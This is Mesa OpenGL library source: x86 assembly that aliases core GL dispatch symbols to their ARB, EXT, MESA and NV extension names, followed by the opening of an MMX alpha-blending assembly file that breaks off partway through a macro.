.globl GL_PREFIX(ClientActiveTexture) ; .set GL_PREFIX(ClientActiveTexture), GL_PREFIX(ClientActiveTextureARB)
.globl GL_PREFIX(MultiTexCoord1d) ; .set GL_PREFIX(MultiTexCoord1d), GL_PREFIX(MultiTexCoord1dARB)
.globl GL_PREFIX(MultiTexCoord1dv) ; .set GL_PREFIX(MultiTexCoord1dv), GL_PREFIX(MultiTexCoord1dvARB)
.globl GL_PREFIX(MultiTexCoord1f) ; .set GL_PREFIX(MultiTexCoord1f), GL_PREFIX(MultiTexCoord1fARB)
.globl GL_PREFIX(MultiTexCoord1fv) ; .set GL_PREFIX(MultiTexCoord1fv), GL_PREFIX(MultiTexCoord1fvARB)
.globl GL_PREFIX(MultiTexCoord1i) ; .set GL_PREFIX(MultiTexCoord1i), GL_PREFIX(MultiTexCoord1iARB)
.globl GL_PREFIX(MultiTexCoord1iv) ; .set GL_PREFIX(MultiTexCoord1iv), GL_PREFIX(MultiTexCoord1ivARB)
.globl GL_PREFIX(MultiTexCoord1s) ; .set GL_PREFIX(MultiTexCoord1s), GL_PREFIX(MultiTexCoord1sARB)
.globl GL_PREFIX(MultiTexCoord1sv) ; .set GL_PREFIX(MultiTexCoord1sv), GL_PREFIX(MultiTexCoord1svARB)
.globl GL_PREFIX(MultiTexCoord2d) ; .set GL_PREFIX(MultiTexCoord2d), GL_PREFIX(MultiTexCoord2dARB)
.globl GL_PREFIX(MultiTexCoord2dv) ; .set GL_PREFIX(MultiTexCoord2dv), GL_PREFIX(MultiTexCoord2dvARB)
.globl GL_PREFIX(MultiTexCoord2f) ; .set GL_PREFIX(MultiTexCoord2f), GL_PREFIX(MultiTexCoord2fARB)
.globl GL_PREFIX(MultiTexCoord2fv) ; .set GL_PREFIX(MultiTexCoord2fv), GL_PREFIX(MultiTexCoord2fvARB)
.globl GL_PREFIX(MultiTexCoord2i) ; .set GL_PREFIX(MultiTexCoord2i), GL_PREFIX(MultiTexCoord2iARB)
.globl GL_PREFIX(MultiTexCoord2iv) ; .set GL_PREFIX(MultiTexCoord2iv), GL_PREFIX(MultiTexCoord2ivARB)
.globl GL_PREFIX(MultiTexCoord2s) ; .set GL_PREFIX(MultiTexCoord2s), GL_PREFIX(MultiTexCoord2sARB)
.globl GL_PREFIX(MultiTexCoord2sv) ; .set GL_PREFIX(MultiTexCoord2sv), GL_PREFIX(MultiTexCoord2svARB)
.globl GL_PREFIX(MultiTexCoord3d) ; .set GL_PREFIX(MultiTexCoord3d), GL_PREFIX(MultiTexCoord3dARB)
.globl GL_PREFIX(MultiTexCoord3dv) ; .set GL_PREFIX(MultiTexCoord3dv), GL_PREFIX(MultiTexCoord3dvARB)
.globl GL_PREFIX(MultiTexCoord3f) ; .set GL_PREFIX(MultiTexCoord3f), GL_PREFIX(MultiTexCoord3fARB)
.globl GL_PREFIX(MultiTexCoord3fv) ; .set GL_PREFIX(MultiTexCoord3fv), GL_PREFIX(MultiTexCoord3fvARB)
.globl GL_PREFIX(MultiTexCoord3i) ; .set GL_PREFIX(MultiTexCoord3i), GL_PREFIX(MultiTexCoord3iARB)
.globl GL_PREFIX(MultiTexCoord3iv) ; .set GL_PREFIX(MultiTexCoord3iv), GL_PREFIX(MultiTexCoord3ivARB)
.globl GL_PREFIX(MultiTexCoord3s) ; .set GL_PREFIX(MultiTexCoord3s), GL_PREFIX(MultiTexCoord3sARB)
.globl GL_PREFIX(MultiTexCoord3sv) ; .set GL_PREFIX(MultiTexCoord3sv), GL_PREFIX(MultiTexCoord3svARB)
.globl GL_PREFIX(MultiTexCoord4d) ; .set GL_PREFIX(MultiTexCoord4d), GL_PREFIX(MultiTexCoord4dARB)
.globl GL_PREFIX(MultiTexCoord4dv) ; .set GL_PREFIX(MultiTexCoord4dv), GL_PREFIX(MultiTexCoord4dvARB)
.globl GL_PREFIX(MultiTexCoord4f) ; .set GL_PREFIX(MultiTexCoord4f), GL_PREFIX(MultiTexCoord4fARB)
.globl GL_PREFIX(MultiTexCoord4fv) ; .set GL_PREFIX(MultiTexCoord4fv), GL_PREFIX(MultiTexCoord4fvARB)
.globl GL_PREFIX(MultiTexCoord4i) ; .set GL_PREFIX(MultiTexCoord4i), GL_PREFIX(MultiTexCoord4iARB)
.globl GL_PREFIX(MultiTexCoord4iv) ; .set GL_PREFIX(MultiTexCoord4iv), GL_PREFIX(MultiTexCoord4ivARB)
.globl GL_PREFIX(MultiTexCoord4s) ; .set GL_PREFIX(MultiTexCoord4s), GL_PREFIX(MultiTexCoord4sARB)
.globl GL_PREFIX(MultiTexCoord4sv) ; .set GL_PREFIX(MultiTexCoord4sv), GL_PREFIX(MultiTexCoord4svARB)
.globl GL_PREFIX(LoadTransposeMatrixd) ; .set GL_PREFIX(LoadTransposeMatrixd), GL_PREFIX(LoadTransposeMatrixdARB)
.globl GL_PREFIX(LoadTransposeMatrixf) ; .set GL_PREFIX(LoadTransposeMatrixf), GL_PREFIX(LoadTransposeMatrixfARB)
.globl GL_PREFIX(MultTransposeMatrixd) ; .set GL_PREFIX(MultTransposeMatrixd), GL_PREFIX(MultTransposeMatrixdARB)
.globl GL_PREFIX(MultTransposeMatrixf) ; .set GL_PREFIX(MultTransposeMatrixf), GL_PREFIX(MultTransposeMatrixfARB)
.globl GL_PREFIX(SampleCoverage) ; .set GL_PREFIX(SampleCoverage), GL_PREFIX(SampleCoverageARB)
.globl GL_PREFIX(CompressedTexImage1D) ; .set GL_PREFIX(CompressedTexImage1D), GL_PREFIX(CompressedTexImage1DARB)
.globl GL_PREFIX(CompressedTexImage2D) ; .set GL_PREFIX(CompressedTexImage2D), GL_PREFIX(CompressedTexImage2DARB)
.globl GL_PREFIX(CompressedTexImage3D) ; .set GL_PREFIX(CompressedTexImage3D), GL_PREFIX(CompressedTexImage3DARB)
.globl GL_PREFIX(CompressedTexSubImage1D) ; .set GL_PREFIX(CompressedTexSubImage1D), GL_PREFIX(CompressedTexSubImage1DARB)
.globl GL_PREFIX(CompressedTexSubImage2D) ; .set GL_PREFIX(CompressedTexSubImage2D), GL_PREFIX(CompressedTexSubImage2DARB)
.globl GL_PREFIX(CompressedTexSubImage3D) ; .set GL_PREFIX(CompressedTexSubImage3D), GL_PREFIX(CompressedTexSubImage3DARB)
.globl GL_PREFIX(GetCompressedTexImage) ; .set GL_PREFIX(GetCompressedTexImage), GL_PREFIX(GetCompressedTexImageARB)
.globl GL_PREFIX(DisableVertexAttribArray) ; .set GL_PREFIX(DisableVertexAttribArray), GL_PREFIX(DisableVertexAttribArrayARB)
.globl GL_PREFIX(EnableVertexAttribArray) ; .set GL_PREFIX(EnableVertexAttribArray), GL_PREFIX(EnableVertexAttribArrayARB)
.globl GL_PREFIX(GetVertexAttribdv) ; .set GL_PREFIX(GetVertexAttribdv), GL_PREFIX(GetVertexAttribdvARB)
.globl GL_PREFIX(GetVertexAttribfv) ; .set GL_PREFIX(GetVertexAttribfv), GL_PREFIX(GetVertexAttribfvARB)
.globl GL_PREFIX(GetVertexAttribiv) ; .set GL_PREFIX(GetVertexAttribiv), GL_PREFIX(GetVertexAttribivARB)
.globl GL_PREFIX(ProgramParameter4dNV) ; .set GL_PREFIX(ProgramParameter4dNV), GL_PREFIX(ProgramEnvParameter4dARB)
.globl GL_PREFIX(ProgramParameter4dvNV) ; .set GL_PREFIX(ProgramParameter4dvNV), GL_PREFIX(ProgramEnvParameter4dvARB)
.globl GL_PREFIX(ProgramParameter4fNV) ; .set GL_PREFIX(ProgramParameter4fNV), GL_PREFIX(ProgramEnvParameter4fARB)
.globl GL_PREFIX(ProgramParameter4fvNV) ; .set GL_PREFIX(ProgramParameter4fvNV), GL_PREFIX(ProgramEnvParameter4fvARB)
.globl GL_PREFIX(VertexAttrib1d) ; .set GL_PREFIX(VertexAttrib1d), GL_PREFIX(VertexAttrib1dARB)
.globl GL_PREFIX(VertexAttrib1dv) ; .set GL_PREFIX(VertexAttrib1dv), GL_PREFIX(VertexAttrib1dvARB)
.globl GL_PREFIX(VertexAttrib1f) ; .set GL_PREFIX(VertexAttrib1f), GL_PREFIX(VertexAttrib1fARB)
.globl GL_PREFIX(VertexAttrib1fv) ; .set GL_PREFIX(VertexAttrib1fv), GL_PREFIX(VertexAttrib1fvARB)
.globl GL_PREFIX(VertexAttrib1s) ; .set GL_PREFIX(VertexAttrib1s), GL_PREFIX(VertexAttrib1sARB)
.globl GL_PREFIX(VertexAttrib1sv) ; .set GL_PREFIX(VertexAttrib1sv), GL_PREFIX(VertexAttrib1svARB)
.globl GL_PREFIX(VertexAttrib2d) ; .set GL_PREFIX(VertexAttrib2d), GL_PREFIX(VertexAttrib2dARB)
.globl GL_PREFIX(VertexAttrib2dv) ; .set GL_PREFIX(VertexAttrib2dv), GL_PREFIX(VertexAttrib2dvARB)
.globl GL_PREFIX(VertexAttrib2f) ; .set GL_PREFIX(VertexAttrib2f), GL_PREFIX(VertexAttrib2fARB)
.globl GL_PREFIX(VertexAttrib2fv) ; .set GL_PREFIX(VertexAttrib2fv), GL_PREFIX(VertexAttrib2fvARB)
.globl GL_PREFIX(VertexAttrib2s) ; .set GL_PREFIX(VertexAttrib2s), GL_PREFIX(VertexAttrib2sARB)
.globl GL_PREFIX(VertexAttrib2sv) ; .set GL_PREFIX(VertexAttrib2sv), GL_PREFIX(VertexAttrib2svARB)
.globl GL_PREFIX(VertexAttrib3d) ; .set GL_PREFIX(VertexAttrib3d), GL_PREFIX(VertexAttrib3dARB)
.globl GL_PREFIX(VertexAttrib3dv) ; .set GL_PREFIX(VertexAttrib3dv), GL_PREFIX(VertexAttrib3dvARB)
.globl GL_PREFIX(VertexAttrib3f) ; .set GL_PREFIX(VertexAttrib3f), GL_PREFIX(VertexAttrib3fARB)
.globl GL_PREFIX(VertexAttrib3fv) ; .set GL_PREFIX(VertexAttrib3fv), GL_PREFIX(VertexAttrib3fvARB)
.globl GL_PREFIX(VertexAttrib3s) ; .set GL_PREFIX(VertexAttrib3s), GL_PREFIX(VertexAttrib3sARB)
.globl GL_PREFIX(VertexAttrib3sv) ; .set GL_PREFIX(VertexAttrib3sv), GL_PREFIX(VertexAttrib3svARB)
.globl GL_PREFIX(VertexAttrib4Nbv) ; .set GL_PREFIX(VertexAttrib4Nbv), GL_PREFIX(VertexAttrib4NbvARB)
.globl GL_PREFIX(VertexAttrib4Niv) ; .set GL_PREFIX(VertexAttrib4Niv), GL_PREFIX(VertexAttrib4NivARB)
.globl GL_PREFIX(VertexAttrib4Nsv) ; .set GL_PREFIX(VertexAttrib4Nsv), GL_PREFIX(VertexAttrib4NsvARB)
.globl GL_PREFIX(VertexAttrib4Nub) ; .set GL_PREFIX(VertexAttrib4Nub), GL_PREFIX(VertexAttrib4NubARB)
.globl GL_PREFIX(VertexAttrib4Nubv) ; .set GL_PREFIX(VertexAttrib4Nubv), GL_PREFIX(VertexAttrib4NubvARB)
.globl GL_PREFIX(VertexAttrib4Nuiv) ; .set GL_PREFIX(VertexAttrib4Nuiv), GL_PREFIX(VertexAttrib4NuivARB)
.globl GL_PREFIX(VertexAttrib4Nusv) ; .set GL_PREFIX(VertexAttrib4Nusv), GL_PREFIX(VertexAttrib4NusvARB)
.globl GL_PREFIX(VertexAttrib4bv) ; .set GL_PREFIX(VertexAttrib4bv), GL_PREFIX(VertexAttrib4bvARB)
.globl GL_PREFIX(VertexAttrib4d) ; .set GL_PREFIX(VertexAttrib4d), GL_PREFIX(VertexAttrib4dARB)
.globl GL_PREFIX(VertexAttrib4dv) ; .set GL_PREFIX(VertexAttrib4dv), GL_PREFIX(VertexAttrib4dvARB)
.globl GL_PREFIX(VertexAttrib4f) ; .set GL_PREFIX(VertexAttrib4f), GL_PREFIX(VertexAttrib4fARB)
.globl GL_PREFIX(VertexAttrib4fv) ; .set GL_PREFIX(VertexAttrib4fv), GL_PREFIX(VertexAttrib4fvARB)
.globl GL_PREFIX(VertexAttrib4iv) ; .set GL_PREFIX(VertexAttrib4iv), GL_PREFIX(VertexAttrib4ivARB)
.globl GL_PREFIX(VertexAttrib4s) ; .set GL_PREFIX(VertexAttrib4s), GL_PREFIX(VertexAttrib4sARB)
.globl GL_PREFIX(VertexAttrib4sv) ; .set GL_PREFIX(VertexAttrib4sv), GL_PREFIX(VertexAttrib4svARB)
.globl GL_PREFIX(VertexAttrib4ubv) ; .set GL_PREFIX(VertexAttrib4ubv), GL_PREFIX(VertexAttrib4ubvARB)
.globl GL_PREFIX(VertexAttrib4uiv) ; .set GL_PREFIX(VertexAttrib4uiv), GL_PREFIX(VertexAttrib4uivARB)
.globl GL_PREFIX(VertexAttrib4usv) ; .set GL_PREFIX(VertexAttrib4usv), GL_PREFIX(VertexAttrib4usvARB)
.globl GL_PREFIX(VertexAttribPointer) ; .set GL_PREFIX(VertexAttribPointer), GL_PREFIX(VertexAttribPointerARB)
.globl GL_PREFIX(BindBuffer) ; .set GL_PREFIX(BindBuffer), GL_PREFIX(BindBufferARB)
.globl GL_PREFIX(BufferData) ; .set GL_PREFIX(BufferData), GL_PREFIX(BufferDataARB)
.globl GL_PREFIX(BufferSubData) ; .set GL_PREFIX(BufferSubData), GL_PREFIX(BufferSubDataARB)
.globl GL_PREFIX(DeleteBuffers) ; .set GL_PREFIX(DeleteBuffers), GL_PREFIX(DeleteBuffersARB)
.globl GL_PREFIX(GenBuffers) ; .set GL_PREFIX(GenBuffers), GL_PREFIX(GenBuffersARB)
.globl GL_PREFIX(GetBufferParameteriv) ; .set GL_PREFIX(GetBufferParameteriv), GL_PREFIX(GetBufferParameterivARB)
.globl GL_PREFIX(GetBufferPointerv) ; .set GL_PREFIX(GetBufferPointerv), GL_PREFIX(GetBufferPointervARB)
.globl GL_PREFIX(GetBufferSubData) ; .set GL_PREFIX(GetBufferSubData), GL_PREFIX(GetBufferSubDataARB)
.globl GL_PREFIX(IsBuffer) ; .set GL_PREFIX(IsBuffer), GL_PREFIX(IsBufferARB)
.globl GL_PREFIX(MapBuffer) ; .set GL_PREFIX(MapBuffer), GL_PREFIX(MapBufferARB)
.globl GL_PREFIX(UnmapBuffer) ; .set GL_PREFIX(UnmapBuffer), GL_PREFIX(UnmapBufferARB)
.globl GL_PREFIX(BeginQuery) ; .set GL_PREFIX(BeginQuery), GL_PREFIX(BeginQueryARB)
.globl GL_PREFIX(DeleteQueries) ; .set GL_PREFIX(DeleteQueries), GL_PREFIX(DeleteQueriesARB)
.globl GL_PREFIX(EndQuery) ; .set GL_PREFIX(EndQuery), GL_PREFIX(EndQueryARB)
.globl GL_PREFIX(GenQueries) ; .set GL_PREFIX(GenQueries), GL_PREFIX(GenQueriesARB)
.globl GL_PREFIX(GetQueryObjectiv) ; .set GL_PREFIX(GetQueryObjectiv), GL_PREFIX(GetQueryObjectivARB)
.globl GL_PREFIX(GetQueryObjectuiv) ; .set GL_PREFIX(GetQueryObjectuiv), GL_PREFIX(GetQueryObjectuivARB)
.globl GL_PREFIX(GetQueryiv) ; .set GL_PREFIX(GetQueryiv), GL_PREFIX(GetQueryivARB)
.globl GL_PREFIX(IsQuery) ; .set GL_PREFIX(IsQuery), GL_PREFIX(IsQueryARB)
.globl GL_PREFIX(CompileShader) ; .set GL_PREFIX(CompileShader), GL_PREFIX(CompileShaderARB)
.globl GL_PREFIX(GetActiveUniform) ; .set GL_PREFIX(GetActiveUniform), GL_PREFIX(GetActiveUniformARB)
.globl GL_PREFIX(GetShaderSource) ; .set GL_PREFIX(GetShaderSource), GL_PREFIX(GetShaderSourceARB)
.globl GL_PREFIX(GetUniformLocation) ; .set GL_PREFIX(GetUniformLocation), GL_PREFIX(GetUniformLocationARB)
.globl GL_PREFIX(GetUniformfv) ; .set GL_PREFIX(GetUniformfv), GL_PREFIX(GetUniformfvARB)
.globl GL_PREFIX(GetUniformiv) ; .set GL_PREFIX(GetUniformiv), GL_PREFIX(GetUniformivARB)
.globl GL_PREFIX(LinkProgram) ; .set GL_PREFIX(LinkProgram), GL_PREFIX(LinkProgramARB)
.globl GL_PREFIX(ShaderSource) ; .set GL_PREFIX(ShaderSource), GL_PREFIX(ShaderSourceARB)
.globl GL_PREFIX(Uniform1f) ; .set GL_PREFIX(Uniform1f), GL_PREFIX(Uniform1fARB)
.globl GL_PREFIX(Uniform1fv) ; .set GL_PREFIX(Uniform1fv), GL_PREFIX(Uniform1fvARB)
.globl GL_PREFIX(Uniform1i) ; .set GL_PREFIX(Uniform1i), GL_PREFIX(Uniform1iARB)
.globl GL_PREFIX(Uniform1iv) ; .set GL_PREFIX(Uniform1iv), GL_PREFIX(Uniform1ivARB)
.globl GL_PREFIX(Uniform2f) ; .set GL_PREFIX(Uniform2f), GL_PREFIX(Uniform2fARB)
.globl GL_PREFIX(Uniform2fv) ; .set GL_PREFIX(Uniform2fv), GL_PREFIX(Uniform2fvARB)
.globl GL_PREFIX(Uniform2i) ; .set GL_PREFIX(Uniform2i), GL_PREFIX(Uniform2iARB)
.globl GL_PREFIX(Uniform2iv) ; .set GL_PREFIX(Uniform2iv), GL_PREFIX(Uniform2ivARB)
.globl GL_PREFIX(Uniform3f) ; .set GL_PREFIX(Uniform3f), GL_PREFIX(Uniform3fARB)
.globl GL_PREFIX(Uniform3fv) ; .set GL_PREFIX(Uniform3fv), GL_PREFIX(Uniform3fvARB)
.globl GL_PREFIX(Uniform3i) ; .set GL_PREFIX(Uniform3i), GL_PREFIX(Uniform3iARB)
.globl GL_PREFIX(Uniform3iv) ; .set GL_PREFIX(Uniform3iv), GL_PREFIX(Uniform3ivARB)
.globl GL_PREFIX(Uniform4f) ; .set GL_PREFIX(Uniform4f), GL_PREFIX(Uniform4fARB)
.globl GL_PREFIX(Uniform4fv) ; .set GL_PREFIX(Uniform4fv), GL_PREFIX(Uniform4fvARB)
.globl GL_PREFIX(Uniform4i) ; .set GL_PREFIX(Uniform4i), GL_PREFIX(Uniform4iARB)
.globl GL_PREFIX(Uniform4iv) ; .set GL_PREFIX(Uniform4iv), GL_PREFIX(Uniform4ivARB)
.globl GL_PREFIX(UniformMatrix2fv) ; .set GL_PREFIX(UniformMatrix2fv), GL_PREFIX(UniformMatrix2fvARB)
.globl GL_PREFIX(UniformMatrix3fv) ; .set GL_PREFIX(UniformMatrix3fv), GL_PREFIX(UniformMatrix3fvARB)
.globl GL_PREFIX(UniformMatrix4fv) ; .set GL_PREFIX(UniformMatrix4fv), GL_PREFIX(UniformMatrix4fvARB)
.globl GL_PREFIX(UseProgram) ; .set GL_PREFIX(UseProgram), GL_PREFIX(UseProgramObjectARB)
.globl GL_PREFIX(ValidateProgram) ; .set GL_PREFIX(ValidateProgram), GL_PREFIX(ValidateProgramARB)
.globl GL_PREFIX(BindAttribLocation) ; .set GL_PREFIX(BindAttribLocation), GL_PREFIX(BindAttribLocationARB)
.globl GL_PREFIX(GetActiveAttrib) ; .set GL_PREFIX(GetActiveAttrib), GL_PREFIX(GetActiveAttribARB)
.globl GL_PREFIX(GetAttribLocation) ; .set GL_PREFIX(GetAttribLocation), GL_PREFIX(GetAttribLocationARB)
.globl GL_PREFIX(DrawBuffers) ; .set GL_PREFIX(DrawBuffers), GL_PREFIX(DrawBuffersARB)
.globl GL_PREFIX(DrawBuffersATI) ; .set GL_PREFIX(DrawBuffersATI), GL_PREFIX(DrawBuffersARB)
.globl GL_PREFIX(PointParameterf) ; .set GL_PREFIX(PointParameterf), GL_PREFIX(PointParameterfEXT)
.globl GL_PREFIX(PointParameterfARB) ; .set GL_PREFIX(PointParameterfARB), GL_PREFIX(PointParameterfEXT)
.globl GL_PREFIX(PointParameterfv) ; .set GL_PREFIX(PointParameterfv), GL_PREFIX(PointParameterfvEXT)
.globl GL_PREFIX(PointParameterfvARB) ; .set GL_PREFIX(PointParameterfvARB), GL_PREFIX(PointParameterfvEXT)
.globl GL_PREFIX(SecondaryColor3b) ; .set GL_PREFIX(SecondaryColor3b), GL_PREFIX(SecondaryColor3bEXT)
.globl GL_PREFIX(SecondaryColor3bv) ; .set GL_PREFIX(SecondaryColor3bv), GL_PREFIX(SecondaryColor3bvEXT)
.globl GL_PREFIX(SecondaryColor3d) ; .set GL_PREFIX(SecondaryColor3d), GL_PREFIX(SecondaryColor3dEXT)
.globl GL_PREFIX(SecondaryColor3dv) ; .set GL_PREFIX(SecondaryColor3dv), GL_PREFIX(SecondaryColor3dvEXT)
.globl GL_PREFIX(SecondaryColor3f) ; .set GL_PREFIX(SecondaryColor3f), GL_PREFIX(SecondaryColor3fEXT)
.globl GL_PREFIX(SecondaryColor3fv) ; .set GL_PREFIX(SecondaryColor3fv), GL_PREFIX(SecondaryColor3fvEXT)
.globl GL_PREFIX(SecondaryColor3i) ; .set GL_PREFIX(SecondaryColor3i), GL_PREFIX(SecondaryColor3iEXT)
.globl GL_PREFIX(SecondaryColor3iv) ; .set GL_PREFIX(SecondaryColor3iv), GL_PREFIX(SecondaryColor3ivEXT)
.globl GL_PREFIX(SecondaryColor3s) ; .set GL_PREFIX(SecondaryColor3s), GL_PREFIX(SecondaryColor3sEXT)
.globl GL_PREFIX(SecondaryColor3sv) ; .set GL_PREFIX(SecondaryColor3sv), GL_PREFIX(SecondaryColor3svEXT)
.globl GL_PREFIX(SecondaryColor3ub) ; .set GL_PREFIX(SecondaryColor3ub), GL_PREFIX(SecondaryColor3ubEXT)
.globl GL_PREFIX(SecondaryColor3ubv) ; .set GL_PREFIX(SecondaryColor3ubv), GL_PREFIX(SecondaryColor3ubvEXT)
.globl GL_PREFIX(SecondaryColor3ui) ; .set GL_PREFIX(SecondaryColor3ui), GL_PREFIX(SecondaryColor3uiEXT)
.globl GL_PREFIX(SecondaryColor3uiv) ; .set GL_PREFIX(SecondaryColor3uiv), GL_PREFIX(SecondaryColor3uivEXT)
.globl GL_PREFIX(SecondaryColor3us) ; .set GL_PREFIX(SecondaryColor3us), GL_PREFIX(SecondaryColor3usEXT)
.globl GL_PREFIX(SecondaryColor3usv) ; .set GL_PREFIX(SecondaryColor3usv), GL_PREFIX(SecondaryColor3usvEXT)
.globl GL_PREFIX(SecondaryColorPointer) ; .set GL_PREFIX(SecondaryColorPointer), GL_PREFIX(SecondaryColorPointerEXT)
.globl GL_PREFIX(MultiDrawArrays) ; .set GL_PREFIX(MultiDrawArrays), GL_PREFIX(MultiDrawArraysEXT)
.globl GL_PREFIX(MultiDrawElements) ; .set GL_PREFIX(MultiDrawElements), GL_PREFIX(MultiDrawElementsEXT)
.globl GL_PREFIX(FogCoordPointer) ; .set GL_PREFIX(FogCoordPointer), GL_PREFIX(FogCoordPointerEXT)
.globl GL_PREFIX(FogCoordd) ; .set GL_PREFIX(FogCoordd), GL_PREFIX(FogCoorddEXT)
.globl GL_PREFIX(FogCoorddv) ; .set GL_PREFIX(FogCoorddv), GL_PREFIX(FogCoorddvEXT)
.globl GL_PREFIX(FogCoordf) ; .set GL_PREFIX(FogCoordf), GL_PREFIX(FogCoordfEXT)
.globl GL_PREFIX(FogCoordfv) ; .set GL_PREFIX(FogCoordfv), GL_PREFIX(FogCoordfvEXT)
.globl GL_PREFIX(BlendFuncSeparate) ; .set GL_PREFIX(BlendFuncSeparate), GL_PREFIX(BlendFuncSeparateEXT)
.globl GL_PREFIX(WindowPos2d) ; .set GL_PREFIX(WindowPos2d), GL_PREFIX(WindowPos2dMESA)
.globl GL_PREFIX(WindowPos2dARB) ; .set GL_PREFIX(WindowPos2dARB), GL_PREFIX(WindowPos2dMESA)
.globl GL_PREFIX(WindowPos2dv) ; .set GL_PREFIX(WindowPos2dv), GL_PREFIX(WindowPos2dvMESA)
.globl GL_PREFIX(WindowPos2dvARB) ; .set GL_PREFIX(WindowPos2dvARB), GL_PREFIX(WindowPos2dvMESA)
.globl GL_PREFIX(WindowPos2f) ; .set GL_PREFIX(WindowPos2f), GL_PREFIX(WindowPos2fMESA)
.globl GL_PREFIX(WindowPos2fARB) ; .set GL_PREFIX(WindowPos2fARB), GL_PREFIX(WindowPos2fMESA)
.globl GL_PREFIX(WindowPos2fv) ; .set GL_PREFIX(WindowPos2fv), GL_PREFIX(WindowPos2fvMESA)
.globl GL_PREFIX(WindowPos2fvARB) ; .set GL_PREFIX(WindowPos2fvARB), GL_PREFIX(WindowPos2fvMESA)
.globl GL_PREFIX(WindowPos2i) ; .set GL_PREFIX(WindowPos2i), GL_PREFIX(WindowPos2iMESA)
.globl GL_PREFIX(WindowPos2iARB) ; .set GL_PREFIX(WindowPos2iARB), GL_PREFIX(WindowPos2iMESA)
.globl GL_PREFIX(WindowPos2iv) ; .set GL_PREFIX(WindowPos2iv), GL_PREFIX(WindowPos2ivMESA)
.globl GL_PREFIX(WindowPos2ivARB) ; .set GL_PREFIX(WindowPos2ivARB), GL_PREFIX(WindowPos2ivMESA)
.globl GL_PREFIX(WindowPos2s) ; .set GL_PREFIX(WindowPos2s), GL_PREFIX(WindowPos2sMESA)
.globl GL_PREFIX(WindowPos2sARB) ; .set GL_PREFIX(WindowPos2sARB), GL_PREFIX(WindowPos2sMESA)
.globl GL_PREFIX(WindowPos2sv) ; .set GL_PREFIX(WindowPos2sv), GL_PREFIX(WindowPos2svMESA)
.globl GL_PREFIX(WindowPos2svARB) ; .set GL_PREFIX(WindowPos2svARB), GL_PREFIX(WindowPos2svMESA)
.globl GL_PREFIX(WindowPos3d) ; .set GL_PREFIX(WindowPos3d), GL_PREFIX(WindowPos3dMESA)
.globl GL_PREFIX(WindowPos3dARB) ; .set GL_PREFIX(WindowPos3dARB), GL_PREFIX(WindowPos3dMESA)
.globl GL_PREFIX(WindowPos3dv) ; .set GL_PREFIX(WindowPos3dv), GL_PREFIX(WindowPos3dvMESA)
.globl GL_PREFIX(WindowPos3dvARB) ; .set GL_PREFIX(WindowPos3dvARB), GL_PREFIX(WindowPos3dvMESA)
.globl GL_PREFIX(WindowPos3f) ; .set GL_PREFIX(WindowPos3f), GL_PREFIX(WindowPos3fMESA)
.globl GL_PREFIX(WindowPos3fARB) ; .set GL_PREFIX(WindowPos3fARB), GL_PREFIX(WindowPos3fMESA)
.globl GL_PREFIX(WindowPos3fv) ; .set GL_PREFIX(WindowPos3fv), GL_PREFIX(WindowPos3fvMESA)
.globl GL_PREFIX(WindowPos3fvARB) ; .set GL_PREFIX(WindowPos3fvARB), GL_PREFIX(WindowPos3fvMESA)
.globl GL_PREFIX(WindowPos3i) ; .set GL_PREFIX(WindowPos3i), GL_PREFIX(WindowPos3iMESA)
.globl GL_PREFIX(WindowPos3iARB) ; .set GL_PREFIX(WindowPos3iARB), GL_PREFIX(WindowPos3iMESA)
.globl GL_PREFIX(WindowPos3iv) ; .set GL_PREFIX(WindowPos3iv), GL_PREFIX(WindowPos3ivMESA)
.globl GL_PREFIX(WindowPos3ivARB) ; .set GL_PREFIX(WindowPos3ivARB), GL_PREFIX(WindowPos3ivMESA)
.globl GL_PREFIX(WindowPos3s) ; .set GL_PREFIX(WindowPos3s), GL_PREFIX(WindowPos3sMESA)
.globl GL_PREFIX(WindowPos3sARB) ; .set GL_PREFIX(WindowPos3sARB), GL_PREFIX(WindowPos3sMESA)
.globl GL_PREFIX(WindowPos3sv) ; .set GL_PREFIX(WindowPos3sv), GL_PREFIX(WindowPos3svMESA)
.globl GL_PREFIX(WindowPos3svARB) ; .set GL_PREFIX(WindowPos3svARB), GL_PREFIX(WindowPos3svMESA)
.globl GL_PREFIX(BindProgramARB) ; .set GL_PREFIX(BindProgramARB), GL_PREFIX(BindProgramNV)
.globl GL_PREFIX(DeleteProgramsARB) ; .set GL_PREFIX(DeleteProgramsARB), GL_PREFIX(DeleteProgramsNV)
.globl GL_PREFIX(GenProgramsARB) ; .set GL_PREFIX(GenProgramsARB), GL_PREFIX(GenProgramsNV)
.globl GL_PREFIX(GetVertexAttribPointerv) ; .set GL_PREFIX(GetVertexAttribPointerv), GL_PREFIX(GetVertexAttribPointervNV)
.globl GL_PREFIX(GetVertexAttribPointervARB) ; .set GL_PREFIX(GetVertexAttribPointervARB), GL_PREFIX(GetVertexAttribPointervNV)
.globl GL_PREFIX(IsProgramARB) ; .set GL_PREFIX(IsProgramARB), GL_PREFIX(IsProgramNV)
.globl GL_PREFIX(PointParameteri) ; .set GL_PREFIX(PointParameteri), GL_PREFIX(PointParameteriNV)
.globl GL_PREFIX(PointParameteriv) ; .set GL_PREFIX(PointParameteriv), GL_PREFIX(PointParameterivNV)
.globl GL_PREFIX(BlendEquationSeparate) ; .set GL_PREFIX(BlendEquationSeparate), GL_PREFIX(_dispatch_stub_745)
#if defined(GLX_USE_TLS) && defined(__linux__)
.section ".note.ABI-tag", "a"
.p2align 2
.long 1f - 0f /* name length */
.long 3f - 2f /* data length */
.long 1 /* note length */
0: .asciz "GNU" /* vendor name */
1: .p2align 2
2: .long 0 /* note data: the ABI tag */
.long 2,4,20 /* Minimum kernel version w/TLS */
3: .p2align 2 /* pad out section */
#endif /* GLX_USE_TLS */
#if defined (__ELF__) && defined (__linux__)
.section .note.GNU-stack,"",%progbits
#endif
|
AIFM-sys/AIFM
| 17,042
|
shenango/apps/parsec/pkgs/libs/mesa/src/src/mesa/x86/mmx_blend.S
|
;
/*
* Written by Jos Fonseca <j_r_fonseca@yahoo.co.uk>
*/
#ifdef USE_MMX_ASM
#include "matypes.h"
/* integer multiplication - alpha plus one
*
* makes the following approximation to the division (Sree)
*
* rgb*a/255 ~= (rgb*(a+1)) >> 256
*
* which is the fastest method that satisfies the following OpenGL criteria
*
* 0*0 = 0 and 255*255 = 255
*
* note that MX1 is a register with 0xffffffffffffffff constant which can be easily obtained making
*
* PCMPEQW ( MX1, MX1 )
*/
#define GMB_MULT_AP1( MP1, MA1, MP2, MA2, MX1 ) \
PSUBW ( MX1, MA1 ) /* a1 + 1 | a1 + 1 | a1 + 1 | a1 + 1 */ ;\
